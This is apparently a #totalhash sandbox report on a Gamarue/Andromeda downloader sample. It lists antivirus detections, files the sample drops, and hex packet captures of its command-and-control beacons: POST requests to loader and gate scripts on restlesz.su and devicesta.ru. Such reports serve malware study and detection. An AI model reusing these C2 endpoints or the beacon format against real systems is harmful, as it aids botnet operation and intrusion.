Analysis | #totalhash

Analysis Date	2018-04-08 13:40:41
MD5	c946179eb8246c542ba7e06289183e79
SHA1	f652b0385290301bf1b55fb1a5ebd1052141937f

Static Details:

AV	Arcabit (arcavir)	Gen:Variant.Symmi.28546
AV	Authentium	W32/Trojan.KYQA-2633
AV	Grisoft (avg)	No Virus
AV	Avira (antivir)	TR/Kryptik.1625441
AV	Alwil (avast)	Bundpil-C [Trj]
AV	Ad-Aware	Gen:Variant.Symmi.28546
AV	BitDefender	Gen:Variant.Symmi.28546
AV	BullGuard	Gen:Variant.Symmi.28546
AV	ClamAV	Win.Trojan.Agent-1109687
AV	Dr. Web	BackDoor.Andromeda.178
AV	Emsisoft	Gen:Variant.Symmi.28546
AV	MicroWorld (escan)	Gen:Variant.Symmi.28546
AV	CA (E-Trust Ino)	Gen:Variant.Symmi.28546
AV	Fortinet	Error Scanning File
AV	Frisk (f-prot)	W32/Trojan2.OAPW
AV	F-Secure	Trojan-Downloader:W32/Wauchos.F
AV	Ikarus	Trojan-Downloader.Small
AV	K7	Error Scanning File
AV	Kaspersky	Backdoor.Win32.Androm.deu
AV	MalwareBytes	Trojan.Email.Bot
AV	Mcafee	W32/Worm-FKO!C946179EB824
AV	Microsoft Security Essentials	Worm:Win32/Gamarue.I
AV	NANO	Trojan.Win32.Andromeda.cjgqby
AV	NANO	Trojan.Win32.Andromeda.dpkxyv
AV	Eset (nod32)	Win32/TrojanDownloader.Wauchos.L
AV	Padvish	Worm.Win32.Gamarue.SameMsiexec1
AV	CAT (quickheal)	Worm.Gamarue.A5
AV	Rising	No Virus
AV	360 Safe	Trojan.Win32.Agent.FN
AV	SUPERAntiSpyware	Trojan.Agent/Gen-FalComp
AV	Symantec	Downloader.Dromedan
AV	Trend Micro	WORM_GAMARUE.SMV
AV	Twister	Trojan.3F06E5417E4C04E9
AV	VirusBlokAda (vba32)	SScope.Malware-Cryptor.Wauchos.2183
AV	Windows Defender	Worm:Win32/Gamarue.I
AV	Zillya!	Backdoor.Androm.Win32.2864

Runtime Details:

Screenshot

Process
↳ C:\Windows\System32\lsass.exe

Process
↳ C:\Users\Phil\AppData\Local\Temp\f652b0385290301bf1b55fb1a5ebd1052141937f.exe

Creates File	C:\Windows\SysWOW64\msiexec.exe

Process
↳ C:\Windows\SysWOW64\msiexec.exe

Creates Mutex	3770066751
Creates File	C:\Windows\Globalization\Sorting\sortdefault.nls
Creates File	C:\Users\Phil\AppData\Local\Temp\f652b0385290301bf1b55fb1a5ebd1052141937f.exe
Creates File	C:\ProgramData\Local Settings\Temp\ccceawu.com
Creates File	C:\Windows\SysWOW64\msiexec.exe
Creates File	C:\ProgramData\Local Settings\Temp\ccceawu.com

Network Details:

Raw Pcap

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a                                    .

0x00000000 (00000)   504f5354 202f6761 7465322e 70687020   POST /gate2.php 
0x00000010 (00016)   48545450 2f312e31 0d0a486f 73743a20   HTTP/1.1..Host: 
0x00000020 (00032)   72657374 6c65737a 2e73750d 0a557365   restlesz.su..Use
0x00000030 (00048)   722d4167 656e743a 204d6f7a 69316c61   r-Agent: Mozi1la
0x00000040 (00064)   2f342e30 0d0a436f 6e74656e 742d5479   /4.0..Content-Ty
0x00000050 (00080)   70653a20 6170706c 69636174 696f6e2f   pe: application/
0x00000060 (00096)   782d7777 772d666f 726d2d75 726c656e   x-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 300d0a43 6f6e6e65   ength: 80..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68433435 75315446 462b4a6d   upqchC45u1TFF+Jm
0x000000b0 (00176)   6e594b47 4977694c 71587779 4773436f   nYKGIwiLqXwyGsCo
0x000000c0 (00192)   41334f75 74314168 33486156 73516a34   A3Out1Ah3HaVsQj4
0x000000d0 (00208)   35594371 474b326c 58663250 76494d65   5YCqGK2lXf2PvIMe
0x000000e0 (00224)   744a337a 4d527345 4b555139 35533438   tJ3zMRsEKUQ95S48
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f6e6373 692e7478 74204854   GET /ncsi.txt HT
0x00000010 (00016)   54502f31 2e310d0a 436f6e6e 65637469   TP/1.1..Connecti
0x00000020 (00032)   6f6e3a20 436c6f73 650d0a55 7365722d   on: Close..User-
0x00000030 (00048)   4167656e 743a204d 6963726f 736f6674   Agent: Microsoft
0x00000040 (00064)   204e4353 490d0a48 6f73743a 20777777    NCSI..Host: www
0x00000050 (00080)   2e6d7366 746e6373 692e636f 6d0d0a0d   .msftncsi.com...
0x00000060 (00096)   0a2d7777 772d666f 726d2d75 726c656e   .-www-form-urlen
0x00000070 (00112)   636f6465 640d0a43 6f6e7465 6e742d4c   coded..Content-L
0x00000080 (00128)   656e6774 683a2038 300d0a43 6f6e6e65   ength: 80..Conne
0x00000090 (00144)   6374696f 6e3a2063 6c6f7365 0d0a0d0a   ction: close....
0x000000a0 (00160)   75707163 68433435 75315446 462b4a6d   upqchC45u1TFF+Jm
0x000000b0 (00176)   6e594b47 4977694c 71587779 4773436f   nYKGIwiLqXwyGsCo
0x000000c0 (00192)   41334f75 74314168 33486156 73516a34   A3Out1Ah3HaVsQj4
0x000000d0 (00208)   35594371 474b326c 58663250 76494d65   5YCqGK2lXf2PvIMe
0x000000e0 (00224)   744a337a 4d527345 4b555139 35533438   tJ3zMRsEKUQ95S48
0x000000f0 (00240)                                         

0x00000000 (00000)   504f5354 202f3030 31316c64 722e7068   POST /0011ldr.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 486f7374   p HTTP/1.1..Host
0x00000020 (00032)   3a207265 73746c65 737a2e73 750d0a55   : restlesz.su..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 73454b55 51393553   MetJ3zMRsEKUQ95S
0x000000f0 (00240)   3438                                  48

0x00000000 (00000)   504f5354 202f3030 32326c64 722e7068   POST /0022ldr.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 486f7374   p HTTP/1.1..Host
0x00000020 (00032)   3a207265 73746c65 737a2e73 750d0a55   : restlesz.su..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 73454b55 51393553   MetJ3zMRsEKUQ95S
0x000000f0 (00240)   3438                                  48

0x00000000 (00000)   504f5354 202f3030 3034346c 64722e70   POST /00044ldr.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a486f73   hp HTTP/1.1..Hos
0x00000020 (00032)   743a2072 6573746c 65737a2e 73750d0a   t: restlesz.su..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   316c612f 342e300d 0a436f6e 74656e74   1la/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203830 0d0a436f   t-Length: 80..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c71 58777947   +JmnYKGIwiLqXwyG
0x000000c0 (00192)   73436f41 334f7574 31416833 48615673   sCoA3Out1Ah3HaVs
0x000000d0 (00208)   516a3435 59437147 4b326c58 66325076   Qj45YCqGK2lXf2Pv
0x000000e0 (00224)   494d6574 4a337a4d 5273454b 55513935   IMetJ3zMRsEKUQ95
0x000000f0 (00240)   533438                                S48

0x00000000 (00000)   504f5354 202f3030 3035356c 64722e70   POST /00055ldr.p
0x00000010 (00016)   68702048 5454502f 312e310d 0a486f73   hp HTTP/1.1..Hos
0x00000020 (00032)   743a2072 6573746c 65737a2e 73750d0a   t: restlesz.su..
0x00000030 (00048)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000040 (00064)   316c612f 342e300d 0a436f6e 74656e74   1la/4.0..Content
0x00000050 (00080)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000060 (00096)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000070 (00112)   6c656e63 6f646564 0d0a436f 6e74656e   lencoded..Conten
0x00000080 (00128)   742d4c65 6e677468 3a203830 0d0a436f   t-Length: 80..Co
0x00000090 (00144)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x000000a0 (00160)   0a0d0a75 70716368 43343575 31544646   ...upqchC45u1TFF
0x000000b0 (00176)   2b4a6d6e 594b4749 77694c71 58777947   +JmnYKGIwiLqXwyG
0x000000c0 (00192)   73436f41 334f7574 31416833 48615673   sCoA3Out1Ah3HaVs
0x000000d0 (00208)   516a3435 59437147 4b326c58 66325076   Qj45YCqGK2lXf2Pv
0x000000e0 (00224)   494d6574 4a337a4d 5273454b 55513935   IMetJ3zMRsEKUQ95
0x000000f0 (00240)   533438                                S48

0x00000000 (00000)   504f5354 202f6761 74653032 2e706870   POST /gate02.php
0x00000010 (00016)   20485454 502f312e 310d0a48 6f73743a    HTTP/1.1..Host:
0x00000020 (00032)   20646576 69636573 74612e72 750d0a55    devicesta.ru..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a6931   ser-Agent: Mozi1
0x00000040 (00064)   6c612f34 2e300d0a 436f6e74 656e742d   la/4.0..Content-
0x00000050 (00080)   54797065 3a206170 706c6963 6174696f   Type: applicatio
0x00000060 (00096)   6e2f782d 7777772d 666f726d 2d75726c   n/x-www-form-url
0x00000070 (00112)   656e636f 6465640d 0a436f6e 74656e74   encoded..Content
0x00000080 (00128)   2d4c656e 6774683a 2038300d 0a436f6e   -Length: 80..Con
0x00000090 (00144)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000000a0 (00160)   0d0a7570 71636843 34357531 5446462b   ..upqchC45u1TFF+
0x000000b0 (00176)   4a6d6e59 4b474977 694c7158 77794773   JmnYKGIwiLqXwyGs
0x000000c0 (00192)   436f4133 4f757431 41683348 61567351   CoA3Out1Ah3HaVsQ
0x000000d0 (00208)   6a343559 4371474b 326c5866 32507649   j45YCqGK2lXf2PvI
0x000000e0 (00224)   4d65744a 337a4d52 73454b55 51393553   MetJ3zMRsEKUQ95S
0x000000f0 (00240)   343838                                488

0x00000000 (00000)   504f5354 202f3365 31363236 34372d63   POST /3e162647-c
0x00000010 (00016)   3364382d 34346333 2d393937 622d3061   3d8-44c3-997b-0a
0x00000020 (00032)   63396135 66363838 33322f20 48545450   c9a5f68832/ HTTP
0x00000030 (00048)   2f312e31 0d0a4361 6368652d 436f6e74   /1.1..Cache-Cont
0x00000040 (00064)   726f6c3a 206e6f2d 63616368 650d0a43   rol: no-cache..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2043 6c6f7365   onnection: Close
0x00000060 (00096)   0d0a5072 61676d61 3a206e6f 2d636163   ..Pragma: no-cac
0x00000070 (00112)   68650d0a 436f6e74 656e742d 54797065   he..Content-Type
0x00000080 (00128)   3a206170 706c6963 6174696f 6e2f736f   : application/so
0x00000090 (00144)   61702b78 6d6c0d0a 55736572 2d416765   ap+xml..User-Age
0x000000a0 (00160)   6e743a20 57534441 50490d0a 436f6e74   nt: WSDAPI..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3733330d   ent-Length: 733.
0x000000c0 (00192)   0a486f73 743a2031 39322e31 36382e31   .Host: 192.168.1
0x000000d0 (00208)   30302e31 35353a35 3335370d 0a0d0a3c   00.155:5357....<
0x000000e0 (00224)   3f786d6c 20766572 73696f6e 3d22312e   ?xml version="1.
0x000000f0 (00240)   30222065 6e636f64 696e673d 22757466   0" encoding="utf
0x00000100 (00256)   2d38223f 3e3c736f 61703a45 6e76656c   -8"?><soap:Envel
0x00000110 (00272)   6f706520 786d6c6e 733a736f 61703d22   ope xmlns:soap="
0x00000120 (00288)   68747470 3a2f2f77 77772e77 332e6f72   http://www.w3.or
0x00000130 (00304)   672f3230 30332f30 352f736f 61702d65   g/2003/05/soap-e
0x00000140 (00320)   6e76656c 6f706522 20786d6c 6e733a77   nvelope" xmlns:w
0x00000150 (00336)   73613d22 68747470 3a2f2f73 6368656d   sa="http://schem
0x00000160 (00352)   61732e78 6d6c736f 61702e6f 72672f77   as.xmlsoap.org/w
0x00000170 (00368)   732f3230 30342f30 382f6164 64726573   s/2004/08/addres
0x00000180 (00384)   73696e67 2220786d 6c6e733a 6c6d733d   sing" xmlns:lms=
0x00000190 (00400)   22687474 703a2f2f 73636865 6d61732e   "http://schemas.
0x000001a0 (00416)   6d696372 6f736f66 742e636f 6d2f7769   microsoft.com/wi
0x000001b0 (00432)   6e646f77 732f6c6d 732f3230 30372f30   ndows/lms/2007/0
0x000001c0 (00448)   38223e3c 736f6170 3a486561 6465723e   8"><soap:Header>
0x000001d0 (00464)   3c777361 3a546f3e 75726e3a 75756964   <wsa:To>urn:uuid
0x000001e0 (00480)   3a336531 36323634 372d6333 64382d34   :3e162647-c3d8-4
0x000001f0 (00496)   3463332d 39393762 2d306163 39613566   4c3-997b-0ac9a5f
0x00000200 (00512)   36383833 323c2f77 73613a54 6f3e3c77   68832</wsa:To><w
0x00000210 (00528)   73613a41 6374696f 6e3e6874 74703a2f   sa:Action>http:/
0x00000220 (00544)   2f736368 656d6173 2e786d6c 736f6170   /schemas.xmlsoap
0x00000230 (00560)   2e6f7267 2f77732f 32303034 2f30392f   .org/ws/2004/09/
0x00000240 (00576)   7472616e 73666572 2f476574 3c2f7773   transfer/Get</ws
0x00000250 (00592)   613a4163 74696f6e 3e3c7773 613a4d65   a:Action><wsa:Me
0x00000260 (00608)   73736167 6549443e 75726e3a 75756964   ssageID>urn:uuid
0x00000270 (00624)   3a663336 37616237 382d3730 38302d34   :f367ab78-7080-4
0x00000280 (00640)   6237302d 62353130 2d343830 34663138   b70-b510-4804f18
0x00000290 (00656)   30666130 303c2f77 73613a4d 65737361   0fa00</wsa:Messa
0x000002a0 (00672)   67654944 3e3c7773 613a5265 706c7954   geID><wsa:ReplyT
0x000002b0 (00688)   6f3e3c77 73613a41 64647265 73733e68   o><wsa:Address>h
0x000002c0 (00704)   7474703a 2f2f7363 68656d61 732e786d   ttp://schemas.xm
0x000002d0 (00720)   6c736f61 702e6f72 672f7773 2f323030   lsoap.org/ws/200
0x000002e0 (00736)   342f3038 2f616464 72657373 696e672f   4/08/addressing/
0x000002f0 (00752)   726f6c65 2f616e6f 6e796d6f 75733c2f   role/anonymous</
0x00000300 (00768)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000310 (00784)   613a5265 706c7954 6f3e3c77 73613a46   a:ReplyTo><wsa:F
0x00000320 (00800)   726f6d3e 3c777361 3a416464 72657373   rom><wsa:Address
0x00000330 (00816)   3e75726e 3a757569 643a3966 65376130   >urn:uuid:9fe7a0
0x00000340 (00832)   64662d33 6532342d 34663861 2d396633   df-3e24-4f8a-9f3
0x00000350 (00848)   342d6262 66333031 65656339 66343c2f   4-bbf301eec9f4</
0x00000360 (00864)   7773613a 41646472 6573733e 3c2f7773   wsa:Address></ws
0x00000370 (00880)   613a4672 6f6d3e3c 6c6d733a 4c617267   a:From><lms:Larg
0x00000380 (00896)   654d6574 61646174 61537570 706f7274   eMetadataSupport
0x00000390 (00912)   2f3e3c2f 736f6170 3a486561 6465723e   /></soap:Header>
0x000003a0 (00928)   3c736f61 703a426f 64792f3e 3c2f736f   <soap:Body/></so
0x000003b0 (00944)   61703a45 6e76656c 6f70653e            ap:Envelope>

Strings